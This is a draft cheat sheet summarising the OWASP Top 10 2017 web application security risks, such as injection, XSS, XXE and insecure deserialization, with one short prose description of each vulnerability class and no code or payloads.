Show Menu

OWASP Top 10 Application Security Risks Cheat Sheet (DRAFT) by [deleted]

OWASP Top 10 Application Security Risks

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Introd­uction: OWASP

Although the original goal of the OWASP Top 10 project was simply to raise awareness amongst develo­pers, it has become thede facto applic­ation security standard
Source: https:­//w­ww.o­wa­sp.o­rg­/im­age­s/b­/b0­/OW­ASP­_To­p_1­0_2­017­_RC­2_F­ina­l.pdf Copyright © 2003 – 2017 The OWASP Foundation This document is released under the Creative Commons Attrib­ution Share- Alike 4.0 license. For any reuse or distri­bution, you must make it clear to others the license terms of this work

A1:2017 Injection

Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interp­reter as part of a command or query. The attacker’s hostile data can trick the interp­reter into executing unintended commands or accessing data without proper author­iza­tion.

A2:2017 Broken Authen­tic­ation

Applic­ation functions related to authen­tic­ation and session management are often implem­ented incorr­ectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implem­ent­ation flaws to assume other users’ identities (tempo­rarily or perman­ently).

A3:2017 Sensitive Data Exposure

Many web applic­ations and APIs do not properly protect sensitive data, such as financial, health­care, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precau­tions when exchanged with the browser.

A4:2017 XML External Entity (XXE)

Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal SMB file shares on unpatched Windows servers, internal port scanning, remote code execution, and denial of service attacks, such as the Billion Laughs attack.

A5:2017 Broken Access Control

Restri­ctions on what authen­ticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauth­orized functi­onality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.

A6:2017 Security Miscon­fig­uration

Security miscon­fig­uration is the most common issue in the data, which is due in part to manual or ad hoc config­uration (or not config­uring at all), insecure default config­ura­tions, open S3 buckets, miscon­figured HTTP headers, error messages containing sensitive inform­ation, not patching or upgrading systems, framew­orks, depend­encies, and components in a timely fashion (or at all).

A7:2017 Cross-Site Scripting (XSS)

XSS flaws occur whenever an applic­ation includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaSc­ript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A8:2017 Insecure Deseri­ali­zation

Insecure deseri­ali­zation flaws occur when an applic­ation receives hostile serialized objects. Insecure deseri­ali­zation leads to remote code execution. Even if deseri­ali­zation flaws do not result in remote code execution, serialized objects can be replayed, tampered or deleted to spoof users, conduct injection attacks, and elevate privil­eges.

A9:2017 Using Components w/Known Vulner­abi­lities

Compon­ents, such as libraries, framew­orks, and other software modules, run with the same privileges as the applic­ation. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applic­ations and APIs using components with known vulner­abi­lities may undermine applic­ation defenses and enable various attacks and impacts.

A10:2017 Insuff­icient Logging & Monitoring

Insuff­icient logging and monito­ring, coupled with missing or ineffe­ctive integr­ation with incident response allows attackers to further attack systems, maintain persis­tence, pivot to more systems, and tamper, extract or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monito­ring.